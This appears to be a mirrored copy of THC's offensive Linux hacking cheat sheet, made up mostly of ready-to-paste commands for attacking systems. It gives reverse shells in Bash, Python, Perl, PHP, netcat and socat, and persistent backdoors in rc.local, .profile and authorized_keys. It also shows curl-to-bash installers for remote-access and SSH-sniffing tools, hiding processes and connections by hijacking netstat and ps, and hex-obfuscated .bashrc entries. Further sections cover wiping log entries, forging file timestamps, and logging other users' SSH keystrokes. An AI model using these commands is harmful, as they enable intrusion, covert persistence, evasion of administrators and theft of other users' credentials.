Sepphod / thc-tips-tricks-hacks-cheat-sheet

Various tips & tricks

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THC's favourite Tips, Tricks & Hacks (Cheat Sheet)

A collection of our favourite tricks. Many of those tricks are not from us. We merely collect them.

We show the tricks 'as is' without any explanation why they work. You need to know Linux to understand how and why they work.

Got tricks? Join us on Telegram:

  1. Bash
    1. Leave Bash without history
    2. Hide your command
    3. Hide your arguments
    4. Hide a network connection
    5. Hide a process as user
    6. Hide a process as root
    7. Hide scripts
  2. SSH
    1. Almost invisible SSH
    2. SSH tunnel OUT
    3. SSH tunnel IN
    4. SSH socks5 OUT
    5. SSH socks5 IN
  3. Network
    1. ARP discover computers on the local network
    2. ICMP discover local network
    3. Monitor all new TCP connections
    4. Alert on all new TCP connections
    5. Find your public IP address
    6. Check reachability from around the world
    7. Check Open Ports
  4. File Encoding and Transfer
    1. uuencode
    2. openssl
    3. xxd
    4. Multiple binaries
    5. File transfer using screen from REMOTE to LOCAL
    6. File transfer using screen from LOCAL to REMOTE
    7. File transfer using gs-netcat and sftp
  5. Reverse Shell / Dumb Shell
    1. Reverse Shells
      1. with gs-netcat
      2. with Bash
      3. without Bash
      4. with Python
      5. with Perl
      6. with PHP
    2. Upgrading the dumb shell
      1. Upgrade a reverse shell to a pty shell
      2. Upgrade a reverse shell to a fully interactive shell
      3. Reverse shell with socat (fully interactive)
  6. Backdoors
    1. Background reverse shell
    2. authorized_keys
    3. Remote access an entire network
  7. Shell Hacks
    1. Shred files (secure delete)
    2. Shred files without shred
    3. Restore the date of a file
    4. Clean logfile
    5. Hide files from a User without root privileges
  8. Crypto
    1. Generate quick random Password
    2. Linux transportable encrypted filesystems
      1. cryptsetup
      2. EncFS
    3. Encrypting a file
  9. Sniffing a user's SSH session
    1. with strace
    2. with script
    3. with a wrapper script
    4. with SSH-IT
  10. Post Compromise
    1. Find out Linux Distribution
  11. Miscellaneous
    1. OSINT Intelligence Gathering
    2. Tools of the trade
    3. Cool Linux commands
    4. tmux
    5. Useful commands
  12. Other Sites

1.i. Leave Bash without history:

Tell Bash to use /dev/null instead of ~/.bash_history. This is the first command we execute on every shell. It will stop the Bash from logging your commands.

export HISTFILE=/dev/null

(We also clear SSH_* variables in case we logged in with SSH. Otherwise any process we start gets a copy of our IP in /proc/self/environ.)

It is good housekeeping to 'commit suicide' when exiting a shell:

alias exit='kill -9 $$'

Any command starting with a " " (space) will not get logged to history either.

$  id

1.ii. Hide your command

(exec -a syslogd nmap -T0 # Note the brackets '(' and ')'

Starting a background hidden process:

exec -a syslogd nmap -T0 &>nmap.log &

Alternatively if there is no Bash:

cp `which nmap` syslogd
PATH=.:$PATH syslogd -T0

In this example we execute nmap but let it appear with the name syslogd in ps alxwww process list.

1.iii. Hide your arguments

Download zap-args.c. This example will execute nmap but will make it appear as 'syslogd' without any arguments in the ps alxww output.

gcc -Wall -O2 -fpic -shared -o zap-args.c -ldl
LD_PRELOAD=./ exec -a syslogd nmap -T0

Note: There is a gdb variant as well. Anyone?

1.iv. Hide a Network Connection

The trick is to hijack netstat and use grep to filter out our connection. This example filters any connection on port 31337 or ip The same should be done for ss (a netstat alternative).

Method 1 - Hiding a connection with bash-function in ~/.bashrc

Cut & paste this to add the line to ~/.bashrc

echo 'netstat(){ command netstat "$@" | grep -Fv -e :31337 -e; }' >>~/.bashrc \
&& touch -r /etc/passwd ~/.bashrc

Or cut & paste this for an obfuscated entry to ~/.bashrc:

X='netstat(){ command netstat "$@" | grep -Fv -e :31337 -e; }'
echo "eval \$(echo $(echo "$X" | xxd -ps -c1024)|xxd -r -ps) #Initialize PRNG" >>~/.bashrc \
&& touch -r /etc/passwd ~/.bashrc

The obfuscated entry to ~/.bashrc will look like this:

eval $(echo 6e65747374617428297b20636f6d6d616e64206e6574737461742022244022207c2067726570202d4676202d65203a3331333337202d6520312e322e332e343b207d0a|xxd -r -ps) #Initialize PRNG

Method 2 - Hiding a connection with a binary in $PATH

Create a fake netstat binary in /usr/local/sbin. On a default Debian (and most Linux) the PATH variables (echo $PATH) lists /usr/local/sbin before /usr/bin. This means that our hijacking binary /usr/local/sbin/netstat will be executed instead of /usr/bin/netstat.

echo -e "#! /bin/bash
exec /usr/bin/netstat \"\$@\" | grep -Fv -e :22 -e" >/usr/local/sbin/netstat \
&& chmod 755 /usr/local/sbin/netstat \
&& touch -r /usr/bin/netstat /usr/local/sbin/netstat

(thank you iamaskid)

1.v. Hide a process as user

Continuing from "Hiding a connection" the same technique can be used to hide a process. This example hides the nmap process and also takes care that our grep does not show up in the process list by renaming it to GREP:

echo 'ps(){ command ps "$@" | exec -a GREP grep -Fv -e nmap  -e GREP; }' >>~/.bashrc \
&& touch -r /etc/passwd ~/.bashrc Hide a process as root

This requires root privileges and is an old Linux trick by over-mounting /proc/<pid> with a useless directory:

    [[ -L /etc/mtab ]] && { cp /etc/mtab /etc/mtab.bak; mv /etc/mtab.bak /etc/mtab; }
    [[ $_pid =~ ^[0-9]+$ ]] && { mount -n --bind /dev/shm /proc/$_pid && echo "[THC] PID $_pid is now hidden"; return; }
    local _argstr
    for _x in "${@:2}"; do _argstr+=" '${_x//\'/\'\"\'\"\'}'"; done
    [[ $(bash -c "ps -o stat= -p \$\$") =~ \+ ]] || exec bash -c "mount -n --bind /dev/shm /proc/\$\$; exec \"$1\" $_argstr"
    bash -c "mount -n --bind /dev/shm /proc/\$\$; exec \"$1\" $_argstr"

To hide a command use:

hide                                 # Hides the current shell/PID
hide 31337                           # Hides process with pid 31337
hide sleep 1234                      # Hides 'sleep 1234'
hide nohup sleep 1234 &>/dev/null &  # Starts and hides 'sleep 1234' as a background process

(thanks to druichi for improving this)

1.vii. Hide shell scripts

Above we discussed how to obfuscate a line in ~/.bashrc. An often used trick is to use source instead. The source command can be shortened to . (yes, a dot) and it also searches through the $PATH variable to find the file to load.

In this example our script prng contains all of our shell functions from above. Those functions hide the nmap process and the network connection. Last we add . prng into the systemwide rc file. This will load prng when the user (and root) logs in:

echo -e 'netstat(){ command netstat "$@" | grep -Fv -e :31337 -e; }
ps(){ command ps "$@" | exec -a GREP grep -Fv -e nmap  -e GREP; }' >/usr/bin/prng \
&& echo ". prng #Initialize Pseudo Random Number Generator" >>/etc/bash.bashrc \
&& touch -r /etc/ /usr/bin/prng /etc/bash.bashrc

(The same works for lsof, ss and ls)

2.i. Almost invisible SSH

ssh -o UserKnownHostsFile=/dev/null -T "bash -i"

This will not add your user to the /var/log/utmp file and you won't show up in w or who command of logged in users. It will bypass .profile and .bash_profile as well. On your client side it will stop logging the host name to ~/.ssh/known_hosts.

2.ii SSH tunnel OUT

We use this all the time to circumvent local firewalls and IP filtering:

ssh -g -L31337:

You or anyone else can now connect to your computer on port 31337 and get tunneled to port 80 and appear with the source IP of ''. An alternative and without the need for a server is to use gs-netcat.

2.iii SSH tunnel IN

We use this to give access to a friend to an internal machine that is not on the public Internet:

ssh -o ExitOnForwardFailure=yes -g -R31338:

Anyone connecting to will get tunneled to on port 80 via your computer. An alternative and without the need for a server is to use gs-netcat.

2.iv SSH socks4/5 OUT

OpenSSH 7.6 adds socks support for dynamic forwarding. Example: Tunnel all your browser traffic through your server.

ssh -D 1080

Now configure your browser to use SOCKS with All your traffic is now tunneled through and will appear with the source IP of An alternative and without the need for a server is to use gs-netcat.

2.v SSH socks4/5 IN

This is the reverse of the above example. It give others access to your local network or let others use your computer as a tunnel end-point.

ssh -g -R 1080

The others configuring as their SOCKS4/5 proxy. They can now connect to any computer on any port that your computer has access to. This includes access to computers behind your firewall that are on your local network. An alternative and without the need for a server is to use gs-netcat.

3.i. ARP discover computers on the local network

nmap -r -sn -PR

This will Arp-ping all local machines just like arping. ARP ping always seems to work and is very stealthy (e.g. does not show up in the target's firewall). However, this command is by far our favourite:

nmap -thc

3.ii. ICMP discover local network

...and when we do not have nmap and we can not do broadcast pings (requires root) then we use this:

for x in `seq 1 254`; do ping -on -c 3 -i 0.1 -W 200 192.168.1.$x | grep 'bytes from' | cut -f4 -d" " | sort -u; done

3.iii. Monitor all new TCP connections

tcpdump -n "tcp[tcpflags] == tcp-syn"

3.iv. Alert on new TCP connections

Make a bing-noise (ascii BEL) when anyone tries to SSH to/from the target system (could be an admin!).

tcpdump -nlq "tcp[13] == 2 and dst port 22" | while read x; do echo "${x}"; echo -en \\a; done

3.v. Find your public IP address

dig +short

Get geolocation information about any IP address:

curl | jq

Check if TOR is working:

curl --socks5 localhost:9050 --socks5-hostname localhost:9050 -s Check reachability from around the world

The fine people at let you ping/traceroute/mtr/dig/port-check a host from around the world, check TCP ports, resolve a domain name, ...and many other things.

3.vii. Check Open Ports on an IP


4.i. File Encoding - uuencode

Binary files transfer badly over a terminal connection. There are many ways to convert a binary into base64 or similar and make the file terminal friendly. We can then use a technique described further on to transfer a file to and from a remote system using nothing else but the shell/terminal as a transport medium (e.g. no separate connection).


$ uuencode /etc/
begin 644 issue-net-COPY

Cut & paste the output (4 lines, starting with 'being 644 ...') into this command: Decode:

$ uudecode
begin 644 issue-net-COPY

4.ii. File Encoding - openssl

Openssl can be used when uu/decode/encode is not available on the remote system:


$ openssl base64 </etc/

Cut & paste the output into this command:

$ openssl base64 -d >

4.iii. File Encoding - xxd

..and if neither uuencode nor openssl is available then we have to dig a bit deeper in our trick box and use xxd.


$ xxd -p </etc/

Cut & paste the output into this command: Decode:

$ xxd -p -r >

4.iv. File Encoding - Multiple Binaries

Method 1: Using shar to create a self extracting shell script with binaries inside:

shar *.png *.c >stuff.shar

Transfer stuff.shar to the remote system and execute it:

chmod 700 stuff.shar

Method 2: Using tar

tar cfz - *.png *.c | openssl base64 >stuff.tgz.b64

Transfer stuff.tgz.b64 to the remote system and execute:

openssl base64 -d <stuff.tgz.b64 | tar xfz -

4.v. File transfer - using screen from REMOTE to LOCAL

Transfer a file FROM the remote system to your local system:

Have a screen running on your local computer and log into the remote system from within your shell. Instruct your local screen to log all output:

CTRL-a : logfile screen-xfer.txt


We use openssl to encode our data but any of the above encoding methods works. This command will display the base64 encoded data in the terminal and screen will write this data to screen-xfer.txt:

openssl base64 </etc/

Stop your local screen from logging any further data:


On your local computer and from a different shell decode the file:

openssl base64 -d <screen-xfer.txt
rm -rf screen-xfer.txt File transfer - using screen from LOCAL to REMOTE

On your local system (from within a different shell) encode the data:

openssl base64 </etc/ >screen-xfer.txt

On the remote system (and from within the current screen):

openssl base64 -d

Get screen to slurp the base64 encoded data into screen's clipboard and paste the data from the clipboard to the remote system:

CTRL-a : readbuf screen-xfer.txt

CTRL-a : paste .



Note: Two C-d are required due to a bug in openssl.

4.vii. File transfer - using gs-netcat and sftp

Use gs-netcat and encapsulate the sftp protocol within. It uses the Global Socket Relay Network and no central server or IP address is required to connect to the SFTP/Gsocket server (just a password hash).

gs-netcat -s MySecret -l -e /usr/lib/sftp-server         # Host

From your workstation execute this command to connect to the SFTP server:

export GSOCKET_ARGS="-s MySecret"                        # Workstation
sftp -D gs-netcat                                        # Workstation

5. Reverse Shells

5.i.a. Reverse shell with gs-netcat

Use gs-netcat. It spawns a fully functioning PTY reverse shell and using the Global Socket Relay network. It uses 'password hashes' instead of IP addresses to connect. This means that you do not need to run your own Command & Control server for the backdoor to connect back to. If netcat is a swiss army knife than gs-netcat is a german battle axe :>

gs-netcat -s MySecret -l -i    # Host

Use -D to start the reverse shell in the background (daemon) and with a watchdog to auto-restart if killed.

To connect to the shell from your workstation:

gs-netcat -s MySecret -i

Use -T to tunnel trough TOR.

5.i.b. Reverse shell with Bash

Start netcat to listen on port 1524 on your system:

nc -nvlp 1524

On the remote system, this command will connect back to your system (IP =, Port 1524) and give you a shell prompt:

setsid bash -i &>/dev/tcp/ 0>&1 &

5.i.c. Reverse shell without Bash

Embedded systems do not always have Bash and the /dev/tcp/ trick will not work. There are many other ways (Python, PHP, Perl, ..). Our favorite is to upload netcat and use netcat or telnet:

On the remote system:

nc -e /bin/bash -vn 1524

Variant if '-e' is not supported:

mkfifo /tmp/.io
sh -i 2>&1 </tmp/.io | nc -vn 1524 >/tmp/.io

Telnet variant:

mkfifo /tmp/.io
sh -i 2>&1 </tmp/.io | telnet 1524 >/tmp/.io

Telnet variant when mkfifo is not supported (Ulg!):

(touch /dev/shm/.fio; sleep 60; rm -f /dev/shm/.fio) &
tail -f /dev/shm/.fio | sh -i 2>&1 | telnet 1524 >/dev/shm/.fio

Note: Use /tmp/.fio if /dev/shm is not available. Note: This trick logs your commands to a file. The file will be unlinked from the fs after 60 seconds but remains useable as a 'make shift pipe' as long as the reverse tunnel is started within 60 seconds.

5.i.d. Reverse shell with Python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",1524));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);["/bin/sh","-i"]);'

5.i.e. Reverse shell with Perl

# method 1
perl -e 'use Socket;$i="";$p=1524;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
# method 2
perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'

5.i.e. Reverse shell with PHP

php -r '$sock=fsockopen("",1524);exec("/bin/bash -i <&3 >&3 2>&3");'

5.ii.a. Upgrade a reverse shell to a PTY shell

Any of the above reverse shells are limited. For example sudo bash or top will not work. To make these work we have to upgrade the shell to a real PTY shell:

exec script -qc /bin/bash /dev/null  # Linux
exec script -q /dev/null /bin/bash   # BSD


# Python
exec python -c 'import pty; pty.spawn("/bin/bash")'

5.ii.b. Upgrade a reverse shell to a fully interactive shell

...and if we also like to use Ctrl-C etc then we have to go all the way and upgrade the reverse shell to a real fully colorful interactive shell:

# On the target host spwan a PTY using any of the above examples:
python -c 'import pty; pty.spawn("/bin/bash")'

# Now Press Ctrl-Z to suspend the connection and return to your own terminal.
# On your terminal execute:
stty raw -echo opost; fg

# On target host
export SHELL=bash
export TERM=xterm-256color
stty rows 24 columns 80

5.ii.c. Reverse shell with socat (fully interactive)

...or install socat and get it done without much fiddling about:

# on attacker's host (listener)
socat file:`tty`,raw,echo=0 tcp-listen:1524
# on target host (reverse shell)
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:

6. Backdoors

Mostly we use gs-netcat's automated deployment script:

bash -c "$(curl -fsSLk"


bash -c "$(wget --no-check-certificate -qO-"

6.i. Background reverse shell

A reverse shell that keeps trying to connect back to us every 3600 seconds (indefinitely). Often used until a real backdoor can be deployed and guarantees easy re-entry to a system in case our connection gets disconnected.

while :; do setsid bash -i &>/dev/tcp/ 0>&1; sleep 3600; done &>/dev/null &

or add to /etc/rc.local:

nohup bash -c 'while :; do setsid bash -i &>/dev/tcp/ 0>&1; sleep 3600; done' &>/dev/null &

or the user's ~/.profile (also stops multiple instances from being started):

fuser /dev/shm/.busy &>/dev/null
if [ $? -eq 1 ]; then
        nohup /bin/bash -c 'while :; do touch /dev/shm/.busy; exec 3</dev/shm/.busy; setsid bash -i &>/dev/tcp/ 0>&1 ; sleep 3600; done' &>/dev/null &

6.ii. authorized_keys

Add your ssh public key to /root/.ssh/authorized_keys. It's the most reliable backdoor ever :>

  • It survives reboots.
  • It even survives re-installs. Admins have been known to make a backup of authorized_keys and then put it straight back onto the newly installed system.
  • We have even seen our key being copied to other companies!

Tip: Change the name at the end of the ssh public keyfile to something obscure like backup@ubuntu or the admin's real name:

$ cat
c3zxLNse/xg0CC16elJpt7IqCFV19AqfHnK4YiXwVJ+M+PyAp/aEAujtHDHp backup@ubuntu

6.iii. Remote Access to an entire network

Install gs-netcat. It creates a SOCKS relay on the Host's private lan which is accessible through the Global Relay network without the need to run your own server (e.g. directly from your workstation):

gs-netcat -l -S       # compromised Host

Now from your workstation you can connect to ANY host on the Host's private LAN:

gs-netcat -p 1080    # Your workstation.

# Access route.local:22 on the Host's private LAN from your Workstation:
socat -  "SOCKS4a:127.1:route.local:22"

Use -T to use TOR.

7.i. Shred & Erase a file

shred -z foobar.txt

7.ii. Shred & Erase without shred

FN=foobar.txt; dd bs=1k count="`du -sk \"${FN}\" | cut -f1`" if=/dev/urandom >"${FN}"; rm -f "${FN}"

Note: Or deploy your files in /dev/shm directory so that no data is written to the harddrive. Data will be deleted on reboot.

Note: Or delete the file and then fill the entire harddrive with /dev/urandom and then rm -rf the dump file.

7.iii. Restore the date of a file

Let's say you have modified /etc/passwd but the file date now shows that /etc/passwd has been modifed. Use touch to change the file data to the date of another file (in this example, /etc/shadow)

touch -r /etc/shadow /etc/passwd

7.iv. Clear logfile

This will reset the logfile to 0 without having to restart syslogd etc:

cat /dev/null >/var/log/auth.log

This will remove any sign of us from the log file:

cd /dev/shm
grep -v 'thc\.org' /var/log/auth.log >a.log; cat a.log >/var/log/auth.log; rm -f a.log

7.v. Hide files from that User without root privileges

Our favorite working directory is /dev/shm/. This location is volatile memory and will be lost on reboot. NO LOGZ == NO CRIME.

Hiding permanent files:

Method 1:

alias ls='ls -I system-dev'

This will hide the directory system-dev from the ls command. Place in User's ~/.profile or system wide /etc/profile.

Method 2: Tricks from the 80s. Consider any directory that the admin rarely looks into (like /boot/.X11/.. or so):

mkdir '...'
cd '...'

Method 3: Unix allows filenames with about any ASCII character but 0x00. Try tab (\t). Happens that most Admins do not know how to cd into any such directory.

mkdir $'\t'
cd $'\t'

8.i. Generate quick random Password

Good for quick passwords without human element.

openssl rand -base64 24

If openssl is not available then we can also use head to read from /dev/urandom.

head -c 32 < /dev/urandom | xxd -p -c 32

or make it alpha-numeric

head -c 32 < /dev/urandom | base64 | tr -dc '[:alpha:]' | head -c 16

8.ii.a. Linux transportable encrypted filesystems - cryptsetup

Create a 256MB large encrypted file system. You will be prompted for a password.

dd if=/dev/urandom of=/tmp/crypted bs=1M count=256 iflag=fullblock
cryptsetup luksFormat /tmp/crypted
mkfs.ext3 /tmp/crypted


losetup -f
losetup /dev/loop0 /tmp/crypted
cryptsetup open /dev/loop0 crypted
mount -t ext3 /dev/mapper/crypted /mnt/crypted

Store data in /mnt/crypted, then unmount:

umount /mnt/crypted
cryptsetup close crypted
losetup -d /dev/loop0

8.ii.b. Linux transportable encrypted filesystems - EncFS

Create .sec and store the encrypted data in .raw:

mkdir .raw .sec
encfs --standard  "${PWD}/.raw" "${PWD}/.sec"


fusermount -u .sec

8.iii Encrypting a file

Encrypt your 0-Days and log files before transfering them - please. (and pick your own password):


openssl enc -aes-256-cbc -pbkdf2 -k fOUGsg1BJdXPt0CY4I <input.txt >input.txt.enc


openssl enc -d -aes-256-cbc -pbkdf2 -k fOUGsg1BJdXPt0CY4I <input.txt.enc >input.txt

9.i Sniff a user's SSH session with strace

strace -e trace=read -p <PID> 2>&1 | while read x; do echo "$x" | grep '^read.*= [1-9]$' | cut -f2 -d\"; done

Dirty way to monitor a user who is using ssh to connect to another host from a computer that you control.

9.ii Sniff a user's SSH session with script

The tool 'script' has been part of Unix for decades. Add 'script' to the user's .profile. The user's keystrokes and session will be recorded to ~/.ssh-log.txt the next time the user logs in:

echo 'exec script -qc /bin/bash ~/.ssh-log.txt' >>~/.profile

Consider using zap-args to hide the the arguments and /dev/tcp/ as an output file to log to a remote host.

9.iii. Sniff a user's SSH session with a wrapper script

Even dirtier way in case /proc/sys/kernel/yama/ptrace_scope is set to 1 (strace will fail on already running SSH clients unless uid=0)

Create a wrapper script called 'ssh' that executes strace + ssh to log the session:

# Cut & Paste the following into a bash shell:
# Add a local path to the PATH variable so our 'ssh' is executed instead of the real ssh:
echo 'PATH=~/.local/bin:$PATH #0xFD0E' >>~/.profile

# Create a log directory and our own ssh binary
mkdir -p ~/.local/bin ~/.local/logs

cat <<__EOF__ >~/.local/bin/ssh
#! /bin/bash
strace -e trace=read -I 1 -o '! ~/.local/bin/ssh-log \$\$' /usr/bin/ssh \$@

cat <<__EOF__ >~/.local/bin/ssh-log
#! /bin/bash
grep 'read(4' | cut -f2 -d\\" | while read -r x; do
        [[ \${#x} -gt 5 ]] && continue 
        [[ \${x} == +(\\\\n|\\\\r) ]] && { echo ""; continue; }
        echo -n "\${x}"
done >\$HOME/.local/logs/ssh-log-"\${1}"-\`date +%s\`.txt

chmod 755 ~/.local/bin/ssh ~/.local/bin/ssh-log
. ~/.profile

echo -e "\033[1;32m***SUCCESS***.
Logfiles stored in ~/.local/.logs/.
To uninstall cut & paste this\033[0m:\033[1;36m
  grep -v 0xFD0E ~/.profile >~/.profile-new && mv ~/.profile-new ~/.profile
  rm -rf ~/.local/bin/ssh ~/.local/bin/ssh-log ~/.local/logs/ssh-log*.txt
  rmdir ~/.local/bin ~/.local/logs ~/.local &>/dev/null \033[0m"

(thanks to Gerald for testing this)

The SSH session will be sniffed and logged to ~/.ssh/logs/ the next time the user logs into his shell and uses SSH.

9.iv Sniff a user's SSH session using SSH-IT

The easiest way is using

bash -c "$(curl -fsSL"

10.i. Find out Linux Distribution

uname -a; lsb_release -a; cat /etc/*release /etc/issue* /proc/version

11.i. Intelligence Gathering

OSINT Hacker Tools Free. Subdomain Finder, DNS History, Public S3 Buckets, Reverse IP, Certificate Search and much more Free. curl/json interface to many services. Try curl or curl Free OSINT Service (Reverse IP, MTR, port scan, CMS scans, Vulnerability Scans, API support) Open Port DB & DNS Lookup from around the world Domain Recon Tool TLS Certificate Search Historical view of websites DNS search (not free) Wireless Network Mapper Cell Tower Informations Search Engine to find devices & Banners (not free)
OSINT for Detectives Nixintel's OSINT Resource List Awesome OSINT list OSINT tools collection Many OSINT tools

11.ii. Tools


  1. - Disposable emails (List of Disposable-email-services).
  2. - Disposable email service with great Web GUI.
  3. - Disposable SMS/text messages (List of Disposable-SMS-services).


  1. - Tries various exploits/vulnerabilities to gain root (LPE)
  2. - Our favorite site ever since we shared a Pizza with fringe[at] in NYC in 2000
  3. - Also includes metasploit db and google hacking db
  4. - Similar to exploit-db

System Information Gathering

  1. - Quick system informations for hackers.
  2. - Post-exploit tool to find local RCE (type getexploit after install)


  1. - Our very own
  2. - Linux Kernel Module for hiding processes and files
  3. - PHP backdoor


  1. - Scan the entire Internet
  2. - Fast network scanner
  3. - ZMap & ZGrab
  4. - log4j and spring4shell scanner


  1. - Obfuscate Linux binaries
  2. - Share A screen with others

Callback / Command And Control



  1. ngrok or pagekite to make a server behind NAT accessible from the public Internet.

11.iii. Cool Linux commands


11.iv. tmux

Tmux Cheat Sheet
Save Scrollback Ctrl+b + :, then type capture-pane -S - followed by Ctrl+b + : and type save-buffer filename.txt.
Attach Start a new tmux, then type Ctrl+b + s and use LEFT, RIGHT to expand and select any session.
Logging Ctrl+b + Shift + P to start and stop.
Menu Ctrl+b + >. Then use Ctrl+b + UP, DOWN, LEFT or RIGHT to move between the panes.

11.v. Useful commands

Use lsof -Pni or netstat -antpu (or ss -antpu) to list all Internet (-tu) connections.

Use ss -lntp to show all listening (-l) TCP (-t) sockets.

Use netstat -rn or ip route show to show default Internet route.

Use curl to get TLDR help for tar. Works with any other linux command.

Use curl -fsSL | bash to speed test a server.

Hacking over long latency links or slow links can be frustrating. Every keystroke is transmitted one by one and any typo becomes so much more frustrating and time consuming to undo. rlwrap comes to the rescue. It buffers all single keystrokes until Enter is hit and then transmits the entire line at once. This makes it so much easier to type at high speed, correct typos, ...

Example for the receiving end of a revese tunnel:

rlwrap --always-readline nc -vnlp 1524

Example for SSH:

rlwrap --always-readline ssh user@host

12. Other Sites


Shoutz: ADM, subz/#9x, DrWho, spoty


Various tips & tricks


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